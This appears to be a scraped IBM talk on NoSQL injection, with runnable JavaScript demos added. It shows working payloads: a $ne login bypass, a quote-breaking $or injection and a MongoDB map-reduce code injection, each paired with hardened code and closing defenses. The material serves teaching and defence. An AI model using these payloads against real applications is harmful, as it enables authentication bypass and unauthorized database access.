NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM - - PowerPoint PPT Presentation



SLIDE 1

NO SQL! NO INJECTION?

A talk on the state of NoSQL security

Aviv Ron, Alexandra Shulman-Peleg, Emanuel Bronshtein
IBM Cyber Security Center of Excellence, IBM AppScan

SLIDE 2

IBM Security Systems – Cyber Center of Excellence

AVIV RON (@aviv_ron)

  • Security Researcher for IBM Cyber Security Center of Excellence
  • Focus on Application Security in the cloud
  • Ongoing research on new and emerging application vulnerabilities for IBM AppScan, Application Security Testing

SLIDE 3

NOT ONLY SQL

According to http://db-engines.com

SLIDE 4

It's not that relational databases are bad, but some use cases have better solutions.

SLIDE 5

We are just saying tables are not the solution for EVERYTHING

SLIDE 6

Applications of NoSQL

  • Performance
  • Scalability
  • Flexibility
  • Real time web
  • Big data

Images are under Creative Commons license and are attributed to their creators

SLIDE 7

SO… NO SQL, NO WORRIES?

SLIDE 8

INTRODUCING NOSQL INJECTIONS

SLIDE 9

A LOOK AT MONGODB

In the mongo shell, a document is inserted and queried with a JSON-like document rather than a SQL statement:

db.books.insert({ title: 'The Hobbit', author: 'J.R.R. Tolkien' })
db.books.find({ title: 'The Hobbit', author: 'J.R.R. Tolkien' })

The same query document, as the PHP driver expects it:

array('title' => 'The Hobbit', 'author' => 'J.R.R. Tolkien');

SLIDE 10

Login form submitted with: username=tolkien&password=hobbit

$db->logins->find(array("username" => $_POST["username"], "password" => $_POST["password"]));

Resulting query document:

{ username: 'tolkien', password: 'hobbit' }

SLIDE 11

Login form submitted with: username[$ne]=1&password[$ne]=1

PHP turns the bracket notation into nested arrays, so $_POST["username"] is now array('$ne' => 1) and the unchanged code builds:

$db->logins->find(array("username" => array('$ne' => 1), "password" => array('$ne' => 1)));

Resulting query document:

{ username: { $ne: 1 }, password: { $ne: 1 } }

Every document whose username and password are not equal to 1 matches, which is every user, so the login succeeds without a valid password.
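The mechanics of the $ne bypass, as an added example that is not code from the slides: the form body is parsed the way PHP's $_POST parses it (bracket suffixes become nested objects), the nested object is passed into the filter unchanged, and a tiny in-memory matcher shows what the database would return. The LOGINS collection, parseFormBody, matchesFilter and the loginFilterSafe type check are all constructed here for the illustration; a real application would hand the filter to the driver instead of matchesFilter.

```javascript
'use strict';

// Constructed sample collection standing in for db.logins; no MongoDB needed.
const LOGINS = [
  { username: 'tolkien', password: 'hobbit' },
  { username: 'lewis', password: 'narnia' },
];

// Emulates PHP's handling of a form body: "username[$ne]=1" becomes
// { username: { '$ne': '1' } } instead of a flat string value.
function parseFormBody(body) {
  const out = {};
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const val = decodeURIComponent(eq < 0 ? '' : pair.slice(eq + 1).replace(/\+/g, ' '));
    const m = /^([^\[]+)\[([^\]]*)\]$/.exec(key); // name[sub]
    if (m) {
      if (typeof out[m[1]] !== 'object') out[m[1]] = {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Just enough of MongoDB's matching semantics for the two filter shapes on
// the slides: { field: value } (equality) and { field: { $ne: value } }.
function matchesFilter(doc, filter) {
  return Object.keys(filter).every((field) => {
    const cond = filter[field];
    if (cond !== null && typeof cond === 'object') {
      if (Object.prototype.hasOwnProperty.call(cond, '$ne')) return doc[field] !== cond.$ne;
      throw new Error('operator not modelled: ' + JSON.stringify(cond));
    }
    return doc[field] === cond;
  });
}

function findLogins(filter) {
  return LOGINS.filter((doc) => matchesFilter(doc, filter));
}

// Vulnerable: the slide's PHP pattern, request fields copied straight into the filter.
function loginFilterVulnerable(form) {
  return { username: form.username, password: form.password };
}

// Hardened: a credential must be a plain string. An object such as { $ne: '1' }
// is rejected before it can reach the database as an operator.
function loginFilterSafe(form) {
  for (const f of ['username', 'password']) {
    if (typeof form[f] !== 'string') throw new TypeError(f + ' must be a string');
  }
  return { username: form.username, password: form.password };
}

// Runs one request body through a filter builder; returns the matched usernames
// or the rejection message.
function attemptLogin(body, buildFilter) {
  try {
    return findLogins(buildFilter(parseFormBody(body))).map((d) => d.username);
  } catch (e) {
    return 'rejected: ' + e.message;
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(attemptLogin('username=tolkien&password=hobbit', loginFilterVulnerable));
  console.log(attemptLogin('username[$ne]=1&password[$ne]=1', loginFilterVulnerable));
  console.log(attemptLogin('username[$ne]=1&password[$ne]=1', loginFilterSafe));
}
```

The benign body returns only tolkien, the $ne body returns every user through the vulnerable builder, and the hardened builder rejects it before any query is built. The same type check applies to any framework whose body parser produces nested objects from bracket notation.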

SLIDE 12

PHP PARAMETER POLLUTION

$db->logins->find(array("$where" => "function() { return this.price < 100 }"));

SLIDE 13

PHP PARAMETER POLLUTION

From the PHP documentation: "Please make sure that for all special query operators (starting with $) you use single quotes so that PHP doesn't try to replace "$exists" with the value of the variable $exists."

In the query on the previous slide "$where" is a double-quoted string, so PHP interpolates the (undefined) variable $where and the key silently becomes an empty string; the operator the developer intended never reaches the database. Written as '$where' it survives.

SLIDE 14

NOT ONLY IN PHP

Let's take a look at JavaScript

SLIDE 15

Login form submitted with: username=tolkien&password=hobbit

The query document assembled by string concatenation:

var query = "{ username: '" + post_username + "', password: '" + post_password + "' }";

{ username: 'tolkien', password: 'hobbit' }

SLIDE 16

Login form submitted with: username=tolkien', $or: [ {}, { 'a':'a&password=' } ], $comment:'hacked

var query = "{ username: '" + post_username + "', password: '" + post_password + "' }";

{ username: 'tolkien', $or: [ {}, { 'a': 'a', password: '' } ], $comment: 'hacked' }

The quote in the username closes the string early, the empty {} clause inside $or matches every document so the password condition no longer constrains the query, and $comment absorbs the closing quote the template appends after the password.
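The string-built query next to its object-built replacement, as an added example that is not code from the slides. BENIGN and ATTACK are the two request bodies constructed from the slides (the payload split into the two form fields as a browser submits them); evaluateQueryText reproduces what a shell or an eval-style driver call does with the assembled text and exists only to make the injected structure visible; hasInjectedStructure is a constructed check for the demonstration.

```javascript
'use strict';

// Constructed request bodies: a normal login and the payload from the slide.
const BENIGN = { username: 'tolkien', password: 'hobbit' };
const ATTACK = {
  username: "tolkien', $or: [ {}, { 'a':'a",
  password: "' } ], $comment:'hacked",
};

// The slide's pattern: the query document is assembled as text.
function buildQueryText(post) {
  return "{ username: '" + post.username + "', password: '" + post.password + "' }";
}

// What happens when that text is evaluated (shell script, eval-style driver
// call): it is parsed as a JavaScript object literal, so quotes and operators
// in the input become structure. Function() reproduces that step here; it is
// the vulnerability being demonstrated, not a parser to reuse.
function evaluateQueryText(text) {
  return new Function('return (' + text + ');')();
}

// Hardened: build the object and let the driver serialise it. Input is checked
// to be a string and only ever lands in a value position, never in a key.
function buildQueryObject(post) {
  for (const f of ['username', 'password']) {
    if (typeof post[f] !== 'string') throw new TypeError(f + ' must be a string');
  }
  return { username: post.username, password: post.password };
}

// True if the query carries anything beyond the two expected string equalities.
function hasInjectedStructure(query) {
  const keys = Object.keys(query);
  return keys.length !== 2 ||
    keys.some((k) => k !== 'username' && k !== 'password') ||
    keys.some((k) => typeof query[k] !== 'string');
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(evaluateQueryText(buildQueryText(ATTACK)));   // $or and $comment appear as keys
  console.log(JSON.stringify(buildQueryObject(ATTACK)));    // the payload stays a string value
}
```

Evaluating the concatenated text for ATTACK yields a query with three keys (username, $or, $comment); building the object instead keeps the whole payload inside the username value, where it matches no operator and no user.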

SLIDE 17

PEOPLE WILL ALWAYS FIND WAYS TO COMPENSATE FOR LIMITATIONS

SLIDE 18

NOSQL JAVASCRIPT INJECTION

SLIDE 19

MONGODB MAP REDUCE

// $param is the field name taken from the request; PHP interpolates it into the
// JavaScript source of the map function, so whoever controls it controls the code
// the database runs.
$map = "function() {
    for (var i = 0; i < this.items.length; i++) {
        emit(this.name, this.items[i].$param);
    }
}";
$reduce = "function(name, sum) { return Array.sum(sum); }";
$opt = "{ out: 'totals' }";
$db->execute("db.stores.mapReduce($map, $reduce, $opt);");

SLIDE 20

ATTACK ON MAP REDUCE JAVASCRIPT

Value submitted for $param:

a);}},function(kv) { return 1; }, { out: 'x' });db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1

SLIDE 21

ATTACK ON MAP REDUCE JAVASCRIPT

The script passed to $db->execute() after interpolation: the original mapReduce call is closed early, the attacker's own statements run, and the tail is reopened so the whole script stays syntactically valid.

db.stores.mapReduce(function() { for (var i = 0; i < this.items.length; i++) { emit(this.name, this.items[i].a); } }, function(kv) { return 1; }, { out: 'x' });
db.injection.insert({success:1});
return 1;
db.stores.mapReduce(function() { { emit(1,1); } }, function(name, sum) { return Array.sum(sum); }, { out: 'totals' });
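The map-reduce injection from slides 19 to 21 run end to end, as an added example that is not code from the slides. makeFakeDb is a constructed stand-in for the shell's db object that records every collection call instead of talking to a server; executeScript is a constructed stand-in for $db->execute(); ATTACK_PARAM is the value from slide 20. buildMapReduceScriptSafe shows the fix: the field name is validated as an identifier and handed to the map function through mapReduce's scope option (a real option of the shell's db.collection.mapReduce) instead of being spliced into its source.

```javascript
'use strict';

// Fake shell environment: db.<collection>.<op>(...) records the call instead of
// reaching a MongoDB server, so the effect of the injected script is observable.
function makeFakeDb() {
  const calls = [];
  const collection = (name) => ({
    mapReduce: (map, reduce, opt) => { calls.push([name, 'mapReduce', opt && opt.out]); return { ok: 1 }; },
    insert: (doc) => { calls.push([name, 'insert', JSON.stringify(doc)]); return { ok: 1 }; },
  });
  const db = new Proxy({}, { get: (_, name) => collection(String(name)) });
  return { db, calls };
}

// The slide's pattern transposed from PHP: the user-controlled field name is
// spliced into the source text of the map function.
function buildMapReduceScript(param) {
  const map = 'function() { for (var i = 0; i < this.items.length; i++) { emit(this.name, this.items[i].' + param + '); } }';
  const reduce = 'function(name, sum) { return Array.sum(sum); }';
  const opt = "{ out: 'totals' }";
  return 'db.stores.mapReduce(' + map + ', ' + reduce + ', ' + opt + ');';
}

// Stand-in for $db->execute(): evaluates the script text with `db` in scope.
function executeScript(script, db) {
  return new Function('db', script)(db);
}

// Hardened: the field name is validated as an identifier and passed in through
// mapReduce's `scope` option, so it reaches the map function as data (read with
// this.items[i][field]) rather than as part of its source.
function buildMapReduceScriptSafe(param) {
  if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(param)) throw new Error('invalid field name: ' + param);
  const map = 'function() { for (var i = 0; i < this.items.length; i++) { emit(this.name, this.items[i][field]); } }';
  const reduce = 'function(name, sum) { return Array.sum(sum); }';
  const opt = "{ out: 'totals', scope: { field: " + JSON.stringify(param) + ' } }';
  return 'db.stores.mapReduce(' + map + ', ' + reduce + ', ' + opt + ');';
}

// The value from slide 20, submitted as $param.
const ATTACK_PARAM = "a);}},function(kv) { return 1; }, { out: 'x' });db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1";

// Builds the script with the given builder, runs it against the fake db and
// returns the recorded calls in order.
function runScript(param, build) {
  const { db, calls } = makeFakeDb();
  executeScript(build(param), db);
  return calls;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runScript(ATTACK_PARAM, buildMapReduceScript)); // mapReduce to 'x', then the injected insert
  console.log(runScript('price', buildMapReduceScriptSafe));   // a single mapReduce to 'totals'
}
```

With the vulnerable builder the recorded calls are the attacker's mapReduce into 'x' followed by db.injection.insert; the `return 1` then stops the script before the reopened tail. The safe builder refuses ATTACK_PARAM outright and, for a legitimate field name, issues exactly the intended mapReduce.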

SLIDE 22

NOW – LET’S HAVE SOME REST

SLIDE 23

CSRF ATTACK ON NOSQL REST API

SLIDE 24

SLIDE 25

DEFENDING AGAINST RISKS

SLIDE 26

DEFENSES

  • Injections
    • Encode all user input; do not assemble JSON from strings
    • If possible, disable JavaScript execution on the DB; otherwise be careful when inserting user input into JavaScript
    • Beware of $ operators in PHP
  • CSRF
    • Check your HTTP API framework for CSRF protection (no JSONP, use of a random token)
  • General
    • Use automatic tools for application security testing that support NoSQL, such as IBM AppScan
    • Use role-based access control and the principle of least privilege

NoSQL databases suffer from the same security issues their relational siblings do

SLIDE 27

Q&A AND OPEN DISCUSSION

http://xkcd.com/327/